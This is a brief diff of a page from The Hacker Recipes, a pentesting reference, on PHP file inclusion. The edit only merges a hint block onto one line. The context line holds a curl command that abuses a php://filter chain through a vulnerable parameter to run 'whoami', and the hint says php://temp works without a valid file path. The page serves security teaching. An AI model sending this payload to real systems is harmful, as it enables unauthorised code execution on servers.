The-Hacker-Recipes/The-Hacker-Recipes/web-services/attacks-on-inputs/file-inclusion.md

 curl --user-agent "PENTEST" "$URL?parameter=php://filter/$FILTERS/resource=$FILE&cmd=whoami"
 ```

-{% hint style="info" %}
-Finding a valid path to a file on the target is not required.
-PHP wrappers like `php://temp` can be used instead.
+{% hint style="info" %}Finding a valid path to a file on the target is not required.
+PHP wrappers like `php://temp` can be used instead.{% endhint %}
-{% endhint %}

 {% endcode %}